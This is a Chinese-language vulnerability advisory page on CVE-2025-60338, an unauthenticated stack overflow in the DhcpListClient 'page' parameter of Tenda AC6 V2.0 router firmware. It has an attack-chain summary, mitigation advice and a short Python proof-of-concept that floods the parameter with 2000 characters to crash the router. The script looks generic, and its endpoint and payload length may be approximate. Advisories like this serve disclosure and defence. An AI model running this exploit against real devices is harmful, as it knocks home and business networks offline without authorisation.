IPBUF安全漏洞报告
English
CVE-2025-60338 CVSS 7.5 高危

CVE-2025-60338 Tenda AC6 V2.0 DhcpListClient栈溢出漏洞

披露日期: 2025-10-22
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-60338
漏洞类型
栈溢出
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Tenda AC6 V2.0

相关标签

CVE-2025-60338栈溢出Tenda路由器拒绝服务缓冲区溢出DhcpListClientIoT漏洞无需认证

漏洞概述

CVE-2025-60338是影响Tenda AC6 V2.0路由器15.03.06.50固件版本的安全漏洞。该漏洞存在于Web服务器的DhcpListClient函数中,由于对page参数的处理不当,未进行充分的边界检查,导致攻击者可以通过构造超长字符串触发栈溢出。攻击者无需任何认证即可通过HTTP请求远程利用此漏洞。成功的利用可导致路由器服务崩溃,造成拒绝服务(DoS)状态,影响网络的正常运行。由于该漏洞位于路由器核心功能中,攻击者可通过发送精心设计的请求轻易触发漏洞,对家庭和企业网络造成严重安全威胁。

技术细节

该漏洞是典型的栈溢出(Stack Overflow)漏洞。漏洞发生在Tenda AC6 V2.0路由器的Web管理界面DhcpListClient函数处理page参数时。攻击者通过HTTP请求向路由器发送一个超长的page参数值,该值被直接写入栈内存而未进行长度验证。当函数执行时,超长的输入数据会覆盖栈上的返回地址、帧指针等关键数据,可能导致程序控制流被劫持或直接引发崩溃。由于路由器Web服务通常以高权限运行,漏洞可被利用造成拒绝服务攻击。攻击者只需构造类似/page参数=超长字符串的HTTP请求即可触发漏洞,无需认证信息。该漏洞属于CWE-121定义的栈缓冲区溢出类问题。

攻击链分析

STEP 1
1
攻击者识别目标路由器型号为Tenda AC6 V2.0,并确定Web管理界面可访问
STEP 2
2
攻击者构造包含超长字符串的page参数HTTP请求
STEP 3
3
恶意请求被发送到/cgi-bin/DhcpListClient端点
STEP 4
4
DhcpListClient函数处理page参数时未进行边界检查,导致栈缓冲区溢出
STEP 5
5
栈内存被破坏,可能覆盖返回地址或触发崩溃,造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2025-60338 PoC - Tenda AC6 V2.0 DhcpListClient Stack Overflow # Target: Tenda AC6 V2.0 Router # Vulnerability: Stack overflow in page parameter of DhcpListClient function target_ip = "192.168.0.1" # Default Tenda router IP target_port = 80 # Construct malicious payload with oversized page parameter # The overflow triggers when page parameter exceeds expected buffer size payload = "A" * 2000 # Adjust length based on actual vulnerable buffer url = f"http://{target_ip}:{target_port}/cgi-bin/DhcpListClient" params = { "page": payload # Vulnerable parameter causing stack overflow } try: print(f"[*] Sending exploit payload to {url}") print(f"[*] Payload length: {len(payload)}") response = requests.get(url, params=params, timeout=5) print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Exploit sent - Target may be crashed") print(f"[!] Error: {e}")

影响范围

Tenda AC6 V2.0 firmware 15.03.06.50

防御指南

临时缓解措施
在官方补丁发布前,建议通过防火墙限制对路由器80/443端口的访问,仅允许受信任的IP地址访问管理界面,并密切监控设备运行状态。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表